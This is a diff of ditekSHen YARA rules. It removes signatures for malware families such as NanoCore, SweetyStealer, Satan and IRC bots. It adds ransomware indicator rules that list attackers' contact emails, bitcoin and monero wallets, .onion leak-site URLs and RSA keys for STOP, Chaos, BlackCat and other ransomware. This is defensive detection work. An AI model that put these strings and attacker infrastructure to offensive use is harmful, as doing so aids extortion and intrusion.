+		$s1 = "kd8eby0@inboxhub.net" ascii wide nocase
+		$s2 = "kd8eby0@onionmail.org" ascii wide nocase
+		$s3 = "kd8eby0@nuke.africa" ascii wide nocase
+		$s4 = "uspex1@cock.li" ascii wide nocase
+		$s5 = "uspex2@cock.li" ascii wide nocase
+		$s6 = "China.Helper@aol.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Slackbot : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_STOP
 {
 	meta:
-		description = "Detects SlackBot"
-		author = "ditekSHen"
-		id = "cd540aa2-dc8f-5ccc-b66c-a8d72b73c896"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with STOP ransomware"
+		author = "ditekShen"
+		id = "b2279a7f-a187-5a44-bf1f-87c21b3ffa4f"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7547-L7588"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L464-L480"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "919839883c437b69cf7f380830f2499be24415f96f1e42424e4859114f958581"
+		logic_hash = "f0d902edbcbe8ff8f3a751b649554499933b06471920c86a9eea3de23890b4bc"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 57
+		tags = ""
 
 	strings:
-		$x1 = "lp0o4bot v" ascii
-		$x2 = "slackbot " ascii
-		$s1 = "cpu: %lumhz %s, uptime: %u+%.2u:%.2u, os: %s" fullword ascii
-		$s2 = "%s, running for %u+%.2u:%.2u" fullword ascii
-		$s3 = "PONG :%s" fullword ascii
-		$s4 = "PRIVMSG %s :%s" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" fullword ascii
-		$m1 = "saving %s to %s" ascii
-		$m2 = "visit number %u failed" ascii
-		$m3 = "sending %s packets of %s bytes to %s with a delay of %s" ascii
-		$m4 = "file executed" ascii
-		$m5 = "packets sent" ascii
-		$m6 = "upgrading to %s" ascii
-		$m7 = "rebooting..." ascii
-		$c1 = "!@remove" fullword ascii
-		$c2 = "!@restart" fullword ascii
-		$c3 = "!@reboot" fullword ascii
-		$c4 = "!@rndnick" fullword ascii
-		$c5 = "!@exit" fullword ascii
-		$c6 = "!@sysinfo" fullword ascii
-		$c7 = "!@upgrade" fullword ascii
-		$c8 = "!@login" fullword ascii
-		$c9 = "!@run" fullword ascii
-		$c10 = "!@webdl" fullword ascii
-		$c11 = "!@cycle" fullword ascii
-		$c12 = "!@clone" fullword ascii
-		$c13 = "!@visit" fullword ascii
-		$c14 = "!@udp" fullword ascii
-		$c15 = "!@nick" fullword ascii
-		$c16 = "!@say" fullword ascii
-		$c17 = "!@quit" fullword ascii
-		$c18 = "!@part" fullword ascii
-		$c19 = "!@join" fullword ascii
-		$c20 = "!@raw" fullword ascii
+		$s1 = "gorentos@bitmessage.ch" ascii wide nocase
+		$s2 = "gorentos2@firemail.cc" ascii wide nocase
+		$s3 = "manager@mailtemp.ch" ascii wide nocase
+		$s4 = "helprestoremanager@airmail.cc" ascii wide nocase
+		$s5 = "supporthelp@airmail.cc" ascii wide nocase
+		$s6 = "managerhelper@airmail.cc" ascii wide nocase
+		$s7 = "helpteam@mail.ch" ascii wide nocase
+		$s8 = "helpmanager@airmail.cc" ascii wide nocase
+		$s9 = "support@sysmail.ch" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or all of ( $m* ) or ( 10 of ( $c* ) and ( 1 of ( $x* ) or 3 of ( $s* ) or 2 of ( $m* ) ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Sweetystealer : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Diavol
 {
 	meta:
-		description = "Detects SweetyStealer"
-		author = "ditekSHen"
-		id = "21dd1706-2cb5-5b27-ad3a-c3de8e6fb333"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Diavol ransomware"
+		author = "ditekShen"
+		id = "ea499318-ed5b-5597-8f9f-4ece7942cf4b"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7590-L7608"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L482-L491"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ecf22240b47af077055260faba0406721f1b4cc5ed04180285df0de86c4e1241"
+		logic_hash = "c72f4d7854f7ba813c4872d47aad69edb8c2927f380b9213ced1aca52454eee5"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "SWEETY STEALER" wide
-		$s2 = "\\SWEETYLOG.zip" fullword wide
-		$s3 = "\\SWEETY STEALER\\SWEETY\\" ascii
-		$s4 = "\\Sweety" fullword wide
-		$s5 = "SWEETYSTEALER." ascii
-		$s6 = "in Virtual Environment, so we prevented stealing" wide
-		$s7 = ":purple_square:" wide
-		$f1 = "<GetDomainDetect>b__" ascii
-		$f2 = "<GetAllProfiles>b__" ascii
-		$f3 = "<ProcessExtraFieldZip64>b__" ascii
-		$f4 = "<PostExtractCommandLine>k__" ascii
+		$s1 = "/noino.5fws6uqv5byttg2r//:sptth" ascii wide nocase
+		$s2 = "https://r2gttyb5vqu6swf5.onion/" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $s* ) or ( 3 of ( $f* ) and 1 of ( $s* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Genircbot : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Chaos
 {
 	meta:
-		description = "Detects generic IRCBots"
-		author = "ditekSHen"
-		id = "e1faa1dd-bbf5-5208-97d6-a6e8597d39bc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Chaos ransomware"
+		author = "ditekShen"
+		id = "18476655-1468-569e-b518-ebeaf289fbd6"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7610-L7626"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L493-L511"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc7f4599148c45fdf755c07530ae4846b7e283b5c1001c121f9ea05279997dc1"
+		logic_hash = "6e8dce1622dbccca6aa15040b49fc9ea05ec7192f8a79409fd7414690102d09a"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 67
+		tags = ""
 
 	strings:
-		$s1 = "@login" ascii nocase
-		$s2 = "PRIVMSG" fullword ascii
-		$s3 = "JOIN" fullword ascii
-		$s4 = "PING :" fullword ascii
-		$s5 = "NICK" fullword ascii
-		$s6 = "USER" fullword ascii
-		$x1 = "irc.danger.net" fullword ascii nocase
-		$x2 = "evilBot" fullword ascii nocase
-		$x3 = "#evilChannel" fullword ascii nocase
+		$s1 = "anenomous31@gmail.com" ascii wide nocase
+		$s2 = "daengsocietyteam@gmail.com" ascii wide nocase
+		$s3 = "RansHelp@tutanota.com" ascii wide nocase
+		$s4 = "18vhBpgPhZrjJkbuT2ZyUXAnJavaJcTwEd" ascii wide
+		$s5 = "bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0" ascii wide
+		$s6 = "8AFtPnreZp28xoetUyKiQvVtwrov9PtEbMyvczdNZpBN45EUbEsrE8xYVp4NNqPrtxNjQwn3PbW3FG16EPYcPpKzMU78xN6" ascii wide
+		$s7 = "bc1qu6tharwawwny28z9fj6nrxg5cqftaep9ap6z2v" ascii wide
+		$s8 = "bambolina2021@virgilio.it" ascii wide nocase
+		$s9 = "1EoyuvcXdAQQvStkoJZ38vdGm84StD7wjm" ascii wide
+		$s10 = "1G395PJs8ciqvXPZEYb1LfUGPix9h9n3oQ" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 2 of ( $x* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Nitro : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Maze
 {
 	meta:
-		description = "Detects Nitro Ransomware"
-		author = "ditekSHen"
-		id = "3edb62e0-0544-5291-a949-a45fdf881c7e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Maze ransomware"
+		author = "ditekShen"
+		id = "7cc11912-e5d2-5477-ab9b-0c470bb5e1d6"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7628-L7652"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L513-L521"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "03da21ece2de530a9c2ba08a9e44c9a92bc9ca0a6d4ac9507899d1f3dcd03e37"
+		logic_hash = "46070d46c502837e5fb87d0fb75244a1a21e90b4e0ce4b73c408b8dc67fe1bcb"
 		score = 75
-		quality = 69
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$x1 = ".givemenitro" wide
-		$x2 = "Nitro Ransomware" ascii wide
-		$x3 = "\\NitroRansomware.pdb" ascii
-		$x4 = "NitroRansomware" ascii wide nocase
-		$s1 = "Valid nitro code was received" wide
-		$s2 = "discord nitro" ascii wide nocase
-		$s3 = "Starting file encryption" wide
-		$s4 = "NR_decrypt.txt" wide
-		$s5 = "open it unless you have the decryption key." ascii
-		$s6 = "<EncryptAll>b__" ascii
-		$s7 = "<DecryptAll>b__" ascii
-		$s8 = "DECRYPT_PASSWORD" fullword ascii
-		$s9 = "IsEncrypted" fullword ascii
-		$s10 = "CmdProcess_OutputDataReceived" fullword ascii
-		$s11 = "encryptedFileLog" fullword ascii
-		$s12 = "Encrypting:" fullword wide
-		$s13 = "decryption key. If you do so, your files may get corrupted" ascii
+		$s1 = "getmyfilesback@airmail.cc" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) or ( 7 of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Nanocore : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lokilocker
 {
 	meta:
-		description = "Detects NanoCore"
-		author = "ditekSHen"
-		id = "931b98f6-df2b-538b-bc49-ecbbd24334da"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with LokiLocker ransomware"
+		author = "ditekShen"
+		id = "ab2cf390-4544-54ed-913c-d463d0f1bdb0"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7654-L7681"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L523-L531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6336260e0af2b4b51338ee066f41b7c58aa134a6c03ca110db7e088edf2b65a7"
+		logic_hash = "1ab9a2ce7e39d916b389e2adb975e3558ddb7d87f7e9494e6b20cb25edd3cb84"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$x1 = "NanoCore Client" fullword ascii
-		$x2 = "NanoCore.ClientPlugin" fullword ascii
-		$x3 = "NanoCore.ClientPluginHost" fullword ascii
-		$i1 = "IClientApp" fullword ascii
-		$i2 = "IClientData" fullword ascii
-		$i3 = "IClientNetwork" fullword ascii
-		$i4 = "IClientAppHost" fullword ascii
-		$i5 = "IClientDataHost" fullword ascii
-		$i6 = "IClientLoggingHost" fullword ascii
-		$i7 = "IClientNetworkHost" fullword ascii
-		$i8 = "IClientUIHost" fullword ascii
-		$i9 = "IClientNameObjectCollection" fullword ascii
-		$i10 = "IClientReadOnlyNameObjectCollection" fullword ascii
-		$s1 = "ClientPlugin" fullword ascii
-		$s2 = "EndPoint" fullword ascii
-		$s3 = "IPAddress" fullword ascii
-		$s4 = "IPEndPoint" fullword ascii
-		$s5 = "IPHostEntr" fullword ascii
-		$s6 = "get_ClientSettings" fullword ascii
-		$s7 = "get_Connected" fullword ascii
+		$s1 = "Unlockpls.dr01@yahoo.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $i* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $i* ) or 2 of ( $s* ) ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Satan : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackcat
 {
 	meta:
-		description = "Detects Satan ransomware"
-		author = "ditekSHen"
-		id = "f0a9369e-a3d7-5770-b490-4c9a919abb82"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with BlackCat ransomware"
+		author = "ditekShen"
+		id = "21038f8e-73cd-59d2-9eb3-6947d263ab79"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7683-L7709"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L533-L569"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e50daa88e0067a0f00329c6369c0334bd282fb102c91ba5ca770da97851d6d2e"
+		logic_hash = "eb0a4d26170f030775f778cc524749ca283dfa983f84bd364e4df6321eb96cf1"
 		score = 75
-		quality = 50
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "S:(ML;;NRNWNX;;;LW)" fullword wide
-		$s2 = "recycle.bin" fullword wide
-		$s3 = "tmp_" fullword wide
-		$s4 = "%s%08x.%s" fullword wide
-		$s5 = "\"%s\" %s" fullword wide
-		$s6 = "/c \"%s\"" fullword wide
-		$s7 = "Global\\" fullword wide
-		$s8 = "rd /S /Q \"%s\"" fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" fullword ascii
-		$e1 = "*pdf*" fullword wide
-		$e2 = "*rtf*" fullword wide
-		$e3 = "*doc*" fullword wide
-		$e4 = "*docx*" fullword wide
-		$e5 = "*xlsx*" fullword wide
-		$e6 = "*pptx*" fullword wide
-		$e7 = "*moneywell*" fullword wide
-		$o1 = { 56 8d 54 24 34 b9 9e f0 ea be e8 c1 f9 ff ff 8d }
-		$o2 = { b9 34 f6 40 00 e8 ea 0b 00 00 85 c0 0f 84 91 }
-		$o3 = { 53 8d 84 24 34 01 00 00 b9 01 00 00 80 50 a1 64 }
+		$pk1 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0B0ni9tyKHSJmU6gc1iRwNTklYocRKmLPUyOthUIHnZHwL1M2pKlMBwXx81bboVS6Cf8YaCoWW1bCmLwPX421sG22xkmtMy/SfiG8jaYtYiA7r7hOdIUnJgRo6vDvNafZlSD32tFVVjuX8Ec79qj2FM7/MmNcseUgpIQaEACuZcSzMK+jZA4BLT9b5Akkec2hPOXGTPmgaXjL9EJE+0rhNZcm/m6xe4/S5eL2kSCVsNUeG8xWuSO2kDRS8xY3rtJOCNEdqZp1rxzTkhgj3hHqr7AoFAkxNblQ538JcdF5+CGINxckA/ldmP7wQd92tmFk2vcl2WeQykFwMM6L6MsQwIDAQAB" ascii wide
+		$pk2 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA49gzJwP9UwEuYQZT1cdgSpxG6z8TVNLPfS4Qwd3vpWHEOAuvi8JGVEpHPGZnrD1QFoDLSTva3PZ4mqtIVO79GOYb5uQkP7LdJGWbLAjUGptVGmB67jKOOLLrjmuBDHpJXSOGG/vw5vajr4MhNnsvoBLPOC0AOzPM6GBDgKdC9zdUGNEreAjOR4neqwZ2jfYl5k5e3eRF86hmWhGXJQaU1uTmDJwgQIzmUZKo+YCfAHbEbSA4HhsumJfw0MJN7RfKPEQkEVvRIBibHnJuIp1bxk3IGPzTCbyQLHMVLz8wgElEexu8/aO3FT6w4uPY3qD+r2W+ri7xIdEN/pTz6TBKvwIDAQAB" ascii wide
+		$pk3 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tKPNFCbU5Unr9jxlTk4RmUdVhcRydJFts6hMpLzcAXIR2yxiNC0QiF4UovAIpGwX6kxOW7kOaOvABJQP6QENMNSg030VlLoTP+ndfFwIt+X+RUflG4UWPE8yu+kzGpCwp7UjX+hD/SpFbSFRRh3BvL3vEq04DzE0AzifEBE4yxKpLsrMsXyZzWy9Nza8NTO2jrBxoEVM2xCLkULp0wZEPDwgeKGkoxMzqavVWBC+Vxi0atKstbo7/TloNenPagl/eUErk9C8tT67zKgbEh3TFtREgaxa/yrjBvN48BU8JGGxLxy4AeGF0vOUdD0WkJsWYzLVg21ApgJaCDr5zDPuQIDAQAB" ascii wide
+		$pk4 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApw3tWdMaWJvNf2Mejy5H0Y6kuj+lstNpwFyismGDEYhWKPps9c68xl+84o6uLKfqPzNvLnSxlVa6DitcJGeKJEQkzN+C1e1KsfzM63jHybREB2hs+dHbqBq4dbamIQcTrrr4mKzuHJ7aok4mlpRx2Un1XOJaodoV7xOHO7ui5v6uK39MJ3rvitSEBvv5oI0WDlp3IFmtd6UM6r2nygY1ncAUuasalZgF1Vaz7VXOWyX2ReQHbYWWRCR1qyKMQcBtjT5POXx9B8ek1pnU4p65kGe9M794Bhhh20GN24gY5a+zwXwstaNTO9luwd4xjjRQAVsDgjrjkzti27G11ICn6wIDAQAB" ascii wide
+		$pk5 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq8kj5LQJngPsY7AhTaJsUXc5FrSGeKS5gw5PIqk2QPM9TY6+us8TRRzWZ7rGk1zns2klpzpRMUzLIqB8lpCkJjqkOUGfgqs+HN4VIOpoJgFY897xstJCxTc+8pYQEsSqClxJllscU0okkLSQqndIR2Gznlg3qfcwyncJAFBInyqM+L4kbwCQZ6x5HNiLe2lJn8RP2aDiMI+RS1uLYron2G7rxDTUQnxThMtgLAeko8ulaB3TpB0g4lmHCenkEZeBNs81986+MjHnv7KkiscZ7ZrezKjNaIxRs8BAcD9y+Q9QQxCvZMS01ITNXcgiItbA4dsGq1fPJ42yBkkiIodsEQIDAQAB" ascii wide
+		$pk6 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqEoytNrMZRoqyIsFpcjiqVWpuV+cC9jS1umXNg/AnJF/xE7LONAmb1p8Dsx1igIUd65IXfFUxmJjFO5hf8LIBzvjUbBll4lbSgGTAUHa3Jbmr/imle6QftmY32J7dDb4WuJUOx+vLNT0I72CESiyotSzwgvLwjyubTmzTJMkqviYOcgDj45NVOx669cG6FWEaJo3PUZzRx9LS6pkOn8tW+W4NzmHMcrma+LOakan7NU6Khv5Hf5ARNsAA+KvDfP1WXJ/VsLXj6x8SdX0v2iS+y58ehUUmlxc8HNsYdOGFwrwYX9zLyJDedsbPg02c4AE4KXt8vH4+j4lVFtruSy4vwIDAQAB" ascii wide
+		$pk7 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAt9uYkHzaizNXg/S11ncTTLybkMtqrKW8gg6TyzbGWnRNROl9O+l1VZBLG0xiMt1mZbuStl8Lt3l1vlkMa92kgLjN+UfKmq3KhBEheN2uMmR0WpwV83kceVRmzr5lug4RyQ/xA6/OXK4NptDIT4L6CUTBWMyk2mmY0Cq9HyyrjdnHeAXWAcQGFEac7W4jTjONZqI+lgScPewS+cPFnz1hAD0IAqzj5X2mZVSfFGR3tDoIe42jw5wb6W2yi8zb3mgKrGtTBbw0Ppj0UgKrmdN5iFmfUQHLEzKAakDggLcBtrW1o5+4WMaZOLw8maU5byvjXu3F3i3GdQe8SKTYcVK5OQIDAQAB" ascii wide
+		$pk8 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAugqZ4ATE9+9FqununW/DBvGosnUX/bNxQzMYUmE14GJIbNa6vwYSNXOlG09mvdAqZqD3lXihWDjy25+gzqSeS+Fs2qNyTdfGPA8iu2xx5RRUXKLGFThxtIzg3fohAK3+LxJVhxtuITAT38IHacc7dVLHsrddu4UDjiHGFdvXjB55Nwe5cu1BYylHsARMYycBA2FwLP57cKvc2/C3OXBAF6qbsVXBcyFhrKOOYA/+5IjFfEhgHy2FLHRf8lmPQPbSlrM6dk+W4D5KVqOPx/eFp0geUJJlmlre3flI29qWS20bkGqAEz9j07y69HGYN9Nt7+DRgBwrpNo/EkZkuaSTtQIDAQAB" ascii wide
+		$pk9 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuuAQlnowSGaSi2XgnwaHQAFZ6e7C0SwpAyyLTncJ4l5cwFbM+mwnV+iV3a+ert8WqOmW1aKOCjTPXrXNoirQgboVpLfhIIT1uOOss4O8lodRxgB6QrLCI7PYMZ+8VgIdEPPzsjmTFLxFc7DERxnSjhGdRQIjZNjm7bGScJD0MayDL9KTkVdJtC+C9n5dwEwg6XtQbwLDeaGZaByOgB/zR6tlcPQCNU9rj1qfcVrI/dFW4br/NnJbqrH714z+dvCa18IJTcu3kW74CAilvHrl5qFDd8CCQhjLrjQDPxAoCba9aXKr6dwt34/MU0tVRTYjzMAxR4yTh3oEjVT+HifvVwIDAQAB" ascii wide
+		$pk10 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwcPjnPl8bI1A0iudX70FKkTjnLjHyetHN2kAIcyOG10K8vm67n/Ma9mAnoDggD3D6UtAbwjvHwPW1m9WF+MrnBXmBizE0JpwOLtVFcHeVLJXlYn/C5RNZziTCwjauH6TlT7Mo/oHfg7nX4IXEuaeAZz8g9ioeJ1Lydi9ZZM1gmdNk8KuKR0zrrJ6MMAGrhMtblLFVwtMn7IlNjT/BgSL4pDyNa++wI5P4R2rMykJwGu/7o2kKE2IFimtFDyZ5a+CX46cdKt7uo5eKFiqf/jTes9/y5AgoS69mt4fRvWFhP7qHXRO2gG8XAc+9suhiuVUWZTAu3xXz5VsmBtk8pzcpwIDAQAB" ascii wide
+		$pk11 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwMQXFMtYf60KrbUVwNVoPhhrCTNMY3Zv+/WULZRZfJ4dMhYozDxtRVdtBDKtuYuHCGLu/Ymf9wKFFXgVH3En7qI1sU2UdjNR4086X8oSTMUn/GwEAEIZAHtSFuk6AXcXW+eO0yxPF+lt5AZcNnJocWBVZ8RWGvsQdtGgtZalttAynROC4RUGkvD1h1ssMteHWneFLpfzSPGlbu0s0cemsrTPmhexGIenup/YjNdmhbfvvYE9kZfPebGtZHw6oQXWcG7sAlvkGciJl3Eo9FznNj0K+v8WQW5L/UbosZaYVJbxlbtySvqUqZbkLKsmp91tr9bvTiDMZuXZS7iHVqchUQIDAQAB" ascii wide
+		$pk12 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbKVxwYe4PpnPm0XtuqShDqFWCFRBw0tYo2vmLwVPlwa+0+ox8+nF0mzWC3ZZT2XkGSodszosOoocfKAwOjQnA+4/Hokl4hgG6K8O7wWuWlvgo4fkcZShy2cMY9FaC6e4bMfurlDFt7OVrKKWAyEGv49Etq6LNoyl5ddM/XmspG52gscRoIcOTwBL4bD8nVcamZXqE4j2mS62HicQ6q9YgRVs1PLbgVPbg8c2rFzpN1e8wZdPtvyGON0m3CmxsYa63yianbnBAS4WnxEnoI7eCZZNkblr+kZB4J9War5VYHu9lFw4XWeuHget/Rn8oGCJOMHkZMz23NpUVaX9htQAwIDAQAB" ascii wide
+		$url1 = "://zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
+		$url2 = "://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion" ascii wide
+		$url3 = "://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion" ascii wide
+		$url4 = "://aoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd.onion" ascii wide
+		$url5 = "://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion" ascii wide
+		$url6 = "://b6v4ojs7jfvftvcoagjxp7qz33yeljydqy6afzsh26vqbzcjwz4b3zad.onion" ascii wide
+		$url7 = "://htnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd.onion" ascii wide
+		$url8 = "://id7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad.onion" ascii wide
+		$url9 = "://mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
+		$url10 = "://odf3dt34tkqndw5h2l5gt2gwwd3jct5rwwjusbd3vlin2jueyv2qkgid.onion" ascii wide
+		$url11 = "://rfosusl6qdm4zhoqbqnjxaloprld2qz35u77h4aap46rhwkouejsooqd.onion" ascii wide
+		$url12 = "://sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion" ascii wide
+		$url13 = "://xqoykemmcivwtpxh3a6pu3w7sstr2y7hapxdiv4caaxidurmwwbjx2id.onion" ascii wide
+		$url14 = "://y4722ss64vel5hmph75te7lx2x5xz463322ypjirm5ytxviijtdpybid.onion" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $s* ) and 4 of ( $e* ) ) or all of ( $s* ) or ( all of ( $e* ) and 5 of ( $s* ) ) or ( all of ( $o* ) and 8 of them ) )
+		(1 of ( $pk* ) and 1 of ( $url* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Neshta : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Koxic
 {
 	meta:
-		description = "Detects Neshta"
-		author = "ditekSHen"
-		id = "b96ee19e-b631-57fd-bf8a-67d790202c46"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with LokiLocker ransomware"
+		author = "ditekShen"
+		id = "4c4ff722-cac1-5967-9e79-681f47566e96"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7711-L7720"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L571-L580"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7967c1154f652e28e541058a7b7f61aa077cfaf6be58282e1de68d9a6088c1ac"
+		logic_hash = "ca4d0e85cf4c7a134609262e21d5cef98100ba0a046d17ffe51bf3975dc7cae9"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus." fullword ascii
-		$s2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
+		$s1 = "wilhelmkox@tutanota.com" ascii wide nocase
+		$s2 = "F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Linux_Hellokitty : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryuk
 {
 	meta:
-		description = "Detects Linux version of HelloKitty ransomware"
-		author = "ditekSHen"
-		id = "bb228937-8cd8-5fb8-aaed-3bd539ae96f2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Ryuk ransomware"
+		author = "ditekShen"
